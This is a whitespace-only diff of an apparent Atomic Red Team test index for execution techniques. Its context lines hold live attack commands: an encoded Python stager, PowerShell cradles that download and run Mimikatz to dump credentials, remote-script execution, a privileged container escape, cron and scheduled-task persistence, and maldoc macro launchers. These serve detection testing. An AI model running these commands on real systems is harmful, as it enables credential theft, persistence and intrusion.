         command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEsdGltZW91dD0zKS5yZWFkKCk7Cg==''));\\\"
           | python &\""
 
-'
+          '
         name: sh
   T1053.001:
     technique:
@@ -58195,7 +58195,7 @@ execution:
       description: 'This test submits a command to be run in the future by the `at`
         daemon.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -58211,30 +58211,30 @@ execution:
       dependencies:
       - description: 'The `at` and `atd` executables must exist in the PATH
 
-'
+          '
         prereq_command: 'which at && which atd
 
-'
+          '
         get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found
           in the PATH (Package name: `at`)''
 
-'
+          '
       - description: 'The `atd` daemon must be running
 
-'
+          '
         prereq_command: 'systemctl status atd || service atd status
 
-'
+          '
         get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service
           atd start` ; systemd: `systemctl start atd`)''
 
-'
+          '
       executor:
         name: sh
         elevation_required: false
         command: 'echo "#{at_command}" | at #{time_spec}
 
-'
+          '
   T1053.002:
     technique:
       external_references:
@@ -58331,7 +58331,7 @@ execution:
         elevation_required: false
         command: 'at 13:20 /interactive cmd
 
-'
+          '
   T1059:
     technique:
       created: '2017-05-31T21:30:49.546Z'
@@ -58628,7 +58628,7 @@ execution:
         a backdoor container, and run their malicious code remotely by using “kubectl
         exec”.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -58643,20 +58643,20 @@ execution:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: |
           kubectl create -f src/busybox.yaml -n #{namespace}
           kubectl exec -n #{namespace} busybox -- #{command}
         cleanup_command: 'kubectl delete pod busybox -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
   T1053.007:
@@ -58725,7 +58725,7 @@ execution:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -58736,17 +58736,17 @@ execution:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl get cronjobs -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
     - name: CreateCronjob
@@ -58758,7 +58758,7 @@ execution:
         CronJob for scheduling execution of malicious code that would run as a container
         in the cluster.
 
-'
+        '
       supported_platforms:
       - containers
       input_arguments:
@@ -58769,20 +58769,20 @@ execution:
       dependencies:
       - description: 'kubectl must be installed
 
-'
+          '
         get_prereq_command: 'echo "kubectl must be installed manually"
 
-'
+          '
         prereq_command: 'which kubectl
 
-'
+          '
       executor:
         command: 'kubectl create -f src/cronjob.yaml -n #{namespace}
 
-'
+          '
         cleanup_command: 'kubectl delete cronjob art -n #{namespace}
 
-'
+          '
         name: bash
         elevation_required: false
   T1053.003:
@@ -58841,7 +58841,7 @@ execution:
         of the referenced file. This technique was used by numerous IoT automated
         exploitation attacks.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -58861,7 +58861,7 @@ execution:
           echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
         cleanup_command: 'crontab /tmp/notevil
 
-'
+          '
     - name: Cron - Add script to all cron subfolders
       auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0
       description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -58869,7 +58869,7 @@ execution:
         schedule. This technique was used by the threat actor Rocke during the exploitation
         of Linux web servers.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -58901,7 +58901,7 @@ execution:
         to execute on a schedule. This technique was used by the threat actor Rocke
         during the exploitation of Linux web servers.
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -58918,10 +58918,10 @@ execution:
         name: bash
         command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
 
-'
+          '
         cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name}
 
-'
+          '
   T1610:
     technique:
       external_references:
@@ -59008,24 +59008,24 @@ execution:
       - description: Verify docker is installed.
         prereq_command: 'which docker
 
-'
+          '
         get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
           Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
           ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
           echo "Docker installed"; fi
 
-'
+          '
       - description: Verify docker service is running.
         prereq_command: 'sudo systemctl status docker
 
-'
+          '
         get_prereq_command: 'sudo systemctl start docker
 
-'
+          '
       - description: Verify kind is in the path.
         prereq_command: 'which kind
 
-'
+          '
         get_prereq_command: |
           curl -Lo ./kind https://kind.sigs.k8s.io/dl/v0.10.0/kind-linux-amd64
           chmod +x ./kind
@@ -59033,14 +59033,14 @@ execution:
       - description: Verify kind-atomic-cluster is created
         prereq_command: 'sudo kind get clusters
 
-'
+          '
         get_prereq_command: 'sudo kind create cluster --name atomic-cluster
 
-'
+          '
       - description: Verify kubectl is in path
         prereq_command: 'which kubectl
 
-'
+          '
         get_prereq_command: |
           curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl"
           chmod +x ./kubectl
@@ -59050,11 +59050,11 @@ execution:
           -ti --rm --image alpine --overrides ''{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin":
           true,"tty":true,"securityContext":{"privileged":true}}]}}''
 
-'
+          '
         name: sh
         cleanup_command: 'kubectl --context kind-atomic-cluster delete pod atomic-escape-pod
 
-'
+          '
   T1559.002:
     technique:
       created: '2020-02-12T14:10:50.699Z'
@@ -59131,7 +59131,7 @@ execution:
       auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd
       description: 'Executes commands via DDE using Microsfot Word
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -59154,13 +59154,13 @@ execution:
         ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download
         and execute a powershell script
 
-'
+        '
       supported_platforms:
       - windows
       executor:
         command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx
 
-'
+          '
         name: command_prompt
     - name: DDEAUTO
       auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
@@ -59474,7 +59474,7 @@ execution:
       auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2
       description: 'Utilize launchctl
 
-'
+        '
       supported_platforms:
       - macos
       input_arguments:
@@ -59489,10 +59489,10 @@ execution:
       executor:
         command: 'launchctl submit -l #{label_name} -- #{executable_path}
 
-'
+          '
         cleanup_command: 'launchctl remove #{label_name}
 
-'
+          '
         name: bash
   T1053.004:
     technique:
@@ -59633,7 +59633,7 @@ execution:
         jse_path:
           description: 'Path for the macro to write out the "malicious" .jse file
 
-'
+            '
           type: String
           default: C:\Users\Public\art.jse
         ms_product:
@@ -59644,7 +59644,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59655,7 +59655,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59664,13 +59664,13 @@ execution:
           Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
         cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
 
-'
+          '
         name: powershell
     - name: OSTap Payload Download
       auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
       description: 'Uses cscript //E:jscript to download a file
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -59688,7 +59688,7 @@ execution:
           cscript //E:Jscript #{script_file}
         cleanup_command: 'del #{script_file} /F /Q >nul 2>&1
 
-'
+          '
         name: command_prompt
     - name: Maldoc choice flags command execution
       auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
@@ -59706,7 +59706,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59717,7 +59717,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59745,7 +59745,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59756,7 +59756,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59783,7 +59783,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -59794,7 +59794,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59826,7 +59826,7 @@ execution:
       dependencies:
       - description: 'Microsoft Excel must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "Excel.Application" | Out-Null
@@ -59836,7 +59836,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
@@ -59908,7 +59908,7 @@ execution:
       dependencies:
       - description: 'Microsoft Word must be installed
 
-'
+          '
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -59917,10 +59917,10 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually
           to meet this requirement"
 
-'
+          '
       - description: 'Google Chrome must be installed
 
-'
+          '
         prereq_command: |
           try {
             $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
@@ -59929,7 +59929,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Google Chrome manually
           to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59947,7 +59947,7 @@ execution:
         instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify
         anti-pua protection).
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -59967,7 +59967,7 @@ execution:
           & "#{pua_file}"
         cleanup_command: 'Remove-Item #{pua_file}
 
-'
+          '
     - name: Office Generic Payload Download
       auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
       description: |
@@ -59982,14 +59982,14 @@ execution:
         macro_path:
           description: 'Location of file which will be converted to a VBA macro
 
-'
+            '
           type: Path
           default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt
         c2_domain:
           description: 'This required variable points to a user defined HTTP server
             that will host the file_name in the c2_parent_directory.
 
-'
+            '
           type: url
           default: "$false"
         c2_parent_directory:
@@ -60008,7 +60008,7 @@ execution:
         ms_product:
           description: 'Maldoc application Word or Excel
 
-'
+            '
           type: String
           default: Word
       dependency_executor_name: powershell
@@ -60016,17 +60016,17 @@ execution:
       - description: 'Destination c2_domain name or IP address must be set to a running
           HTTP server.
 
-'
+          '
         prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1)
 
-'
+          '
         get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address
           must be set and reachable for HTTP service"
 
-'
+          '
       - description: 'Microsoftt #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -60037,7 +60037,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         name: powershell
         command: |
@@ -60050,7 +60050,7 @@ execution:
         cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}"
           -ErrorAction Ignore
 
-'
+          '
   T1204.003:
     technique:
       external_references:
@@ -60392,7 +60392,7 @@ execution:
       description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz
         dump details and password hashes will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -60404,7 +60404,7 @@ execution:
         command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}'');
           Invoke-Mimikatz -DumpCreds"
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Run BloodHound from local disk
@@ -60424,15 +60424,15 @@ execution:
       dependencies:
       - description: 'SharpHound.ps1 must be located at #{file_path}
 
-'
+          '
         prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else
           {exit 1}
 
-'
+          '
         get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1"
           -OutFile "#{file_path}\SharpHound.ps1"
 
-'
+          '
       executor:
         command: |
           write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
@@ -60441,7 +60441,7 @@ execution:
           Start-Sleep 5
         cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
 
-'
+          '
         name: powershell
     - name: Run Bloodhound from Memory using Download Cradle
       auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -60459,7 +60459,7 @@ execution:
           Start-Sleep 5
         cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
 
-'
+          '
         name: powershell
     - name: Obfuscation Tests
       auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
@@ -60467,7 +60467,7 @@ execution:
         out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM
         REMOTE LOCATION"
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -60482,7 +60482,7 @@ execution:
         will take place to open file explorer, open notepad and input code, then mimikatz
         dump info will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -60513,7 +60513,7 @@ execution:
         command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'');
           Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
 
-'
+          '
         name: command_prompt
     - name: Powershell MsXml COM object - with prompt
       auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
@@ -60533,7 +60533,7 @@ execution:
           MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX
           $comMsXml.ResponseText"
 
-'
+          '
         name: command_prompt
     - name: Powershell XML requests
       auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
@@ -60553,7 +60553,7 @@ execution:
           bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute
           | IEX"
 
-'
+          '
         name: command_prompt
     - name: Powershell invoke mshta.exe download
       auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
@@ -60571,7 +60571,7 @@ execution:
       executor:
         command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
 
-'
+          '
         name: command_prompt
     - name: Powershell Invoke-DownloadCradle
       auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
@@ -60613,26 +60613,26 @@ execution:
       dependencies:
       - description: 'PowerShell version 2 must be installed
 
-'
+          '
         prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit
           0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host  Automated installer not implemented yet,
           please install PowerShell v2 manually
 
-'
+          '
       executor:
         command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
 
-'
+          '
         name: powershell
     - name: NTFS Alternate Data Stream Access
       auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680
       description: 'Creates a file with an alternate data stream and simulates executing
         that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -60643,14 +60643,14 @@ execution:
       dependencies:
       - description: 'Homedrive must be an NTFS drive
 
-'
+          '
         prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem
           -contains "NTFS") {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically
 
-'
+          '
       executor:
         name: powershell
         command: |
@@ -60659,7 +60659,7 @@ execution:
           Invoke-Expression $streamcommand
         cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
 
-'
+          '
     - name: PowerShell Session Creation and Use
       auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd
       description: |
@@ -60676,12 +60676,12 @@ execution:
       dependencies:
       - description: 'PSRemoting must be enabled
 
-'
+          '
         prereq_command: "Try {\n    New-PSSession -ComputerName #{hostname_to_connect}
           -ErrorAction Stop | Out-Null\n    exit 0\n} \nCatch {\n    exit 1\n}\n"
         get_prereq_command: 'Enable-PSRemoting
 
-'
+          '
       executor:
         name: powershell
         elevation_required: true
@@ -60715,7 +60715,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -CommandParamVariation #{command_param_variation} -Execute -ErrorAction
@@ -60751,7 +60751,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
@@ -60782,7 +60782,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
@@ -60818,7 +60818,7 @@ execution:
         get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
           -Force
 
-'
+          '
       executor:
         command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type}
           -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
@@ -60831,7 +60831,7 @@ execution:
         outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection
         Report by Red Canary.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -60842,7 +60842,7 @@ execution:
       executor:
         command: 'powershell.exe -e  #{obfuscated_code}
 
-'
+          '
         name: command_prompt
     - name: PowerShell Invoke Known Malicious Cmdlets
       auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
@@ -60864,7 +60864,7 @@ execution:
             "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy",
             "Set-CriticalProcess", "Set-MasterBootRecord"
 
-'
+            '
       executor:
         name: powershell
         elevation_required: true
@@ -60950,13 +60950,13 @@ execution:
           $which_python -c 'import requests' 2>/dev/null; echo $?
         get_prereq_command: 'pip install requests
 
-'
+          '
       executor:
         command: '$which_python -c ''import requests;import os;url = "#{script_url}";malicious_command
           = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source
           = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)''
 
-'
+          '
         name: sh
         cleanup_command: "rm #{payload_file_name}  \n"
     - name: Execute Python via scripts (Linux)
@@ -60992,7 +60992,7 @@ execution:
       dependencies:
       - description: 'Requires Python
 
-'
+          '
         prereq_command: |
           which_python=`which python`; python -V
           $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -61018,7 +61018,7 @@ execution:
         an external malicious script then executes locally using the supplied executor
         and arguments
 
-'
+        '
       supported_platforms:
       - linux
       input_arguments:
@@ -61052,7 +61052,7 @@ execution:
       dependencies:
       - description: 'Requires Python
 
-'
+          '
         prereq_command: |
           which_python=`which python`; python -V
           $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -61074,7 +61074,7 @@ execution:
         name: sh
         cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
 
-'
+          '
   T1053.005:
     technique:
       created: '2019-11-27T14:58:00.429Z'
@@ -61172,7 +61172,7 @@ execution:
       description: 'Upon successful execution, cmd.exe will create a scheduled task
         to spawn cmd.exe at 20:10.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -61189,10 +61189,10 @@ execution:
         elevation_required: false
         command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
 
-'
+          '
         cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
 
-'
+          '
     - name: Scheduled task Remote
       auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd
       description: |
@@ -61228,11 +61228,11 @@ execution:
         command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN
           "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
 
-'
+          '
         cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password}
           /TN "Atomic task" /F >nul 2>&1
 
-'
+          '
     - name: Powershell Cmdlet Scheduled Task
       auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd
       description: |
@@ -61254,7 +61254,7 @@ execution:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false
           >$null 2>&1
 
-'
+          '
     - name: Task Scheduler via VBA
       auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3
       description: |
@@ -61271,7 +61271,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -61282,7 +61282,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -61295,7 +61295,7 @@ execution:
         login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing
         as Register-ScheduledTask cmdlet behind the scenes.
 
-'
+        '
       supported_platforms:
       - windows
       executor:
@@ -61307,7 +61307,7 @@ execution:
         cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false
           >$null 2>&1
 
-'
+          '
   T1053:
     technique:
       id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -61521,7 +61521,7 @@ execution:
           sc.exe delete #{service_name}
         cleanup_command: 'del C:\art-marker.txt >nul 2>&1
 
-'
+          '
         name: command_prompt
         elevation_required: true
     - name: Use PsExec to execute a command on a remote host
@@ -61555,10 +61555,10 @@ execution:
       - description: 'PsExec tool from Sysinternals must exist on disk at specified
           location (#{psexec_exe})
 
-'
+          '
         prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
 
-'
+          '
         get_prereq_command: |
           Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
           Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -61568,7 +61568,7 @@ execution:
         command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula
           "C:\Windows\System32\calc.exe"
 
-'
+          '
         name: command_prompt
   T1129:
     technique:
@@ -61701,7 +61701,7 @@ execution:
       description: 'An adversary may use Radmin Viewer Utility to remotely control
         Windows device, this will start the radmin console.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -61717,10 +61717,10 @@ execution:
       - description: 'Radmin Viewer Utility must be installed at specified location
           (#{radmin_exe})
 
-'
+          '
         prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
 
-'
+          '
         get_prereq_command: |
           echo Downloading radmin installer
           bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -61993,7 +61993,7 @@ execution:
       auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
       description: 'Creates and executes a simple bash script.
 
-'
+        '
       supported_platforms:
       - macos
       - linux
@@ -62010,7 +62010,7 @@ execution:
           sh #{script_path}
         cleanup_command: 'rm #{script_path}
 
-'
+          '
         name: sh
     - name: Command-Line Interface
       auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -62027,7 +62027,7 @@ execution:
           wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
         cleanup_command: 'rm /tmp/art-fish.txt
 
-'
+          '
         name: sh
   T1204:
     technique:
@@ -62184,7 +62184,7 @@ execution:
       dependencies:
       - description: 'The 64-bit version of Microsoft Office must be installed
 
-'
+          '
         prereq_command: |
           try {
             $wdApp = New-Object -COMObject "Word.Application"
@@ -62195,7 +62195,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62204,7 +62204,7 @@ execution:
         cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
           -like "*mshta*"}  | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
 
-'
+          '
         name: powershell
     - name: Extract Memory via VBA
       auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
@@ -62223,7 +62223,7 @@ execution:
       dependencies:
       - description: 'Microsoft #{ms_product} must be installed
 
-'
+          '
         prereq_command: |
           try {
             New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62234,7 +62234,7 @@ execution:
         get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
           manually to meet this requirement"
 
-'
+          '
       executor:
         command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
           (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -62243,7 +62243,7 @@ execution:
         cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin"
           -ErrorAction Ignore
 
-'
+          '
         name: powershell
   T1059.003:
     technique:
@@ -62294,7 +62294,7 @@ execution:
       description: 'Creates and executes a simple batch script. Upon execution, CMD
         will briefly launch to run the batch script then close again.
 
-'
+        '
       supported_platforms:
       - windows
       input_arguments:
@@ -62310,27 +62310,27 @@ execution:
       dependencies:
       - description: 'Batch file must exist on disk at specified location (#{script_path})
 
-'
+          '
         prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1}
 
-'
+          '
         get_prereq_command: |
           New-Item #{script_path} -Force | Out-Null
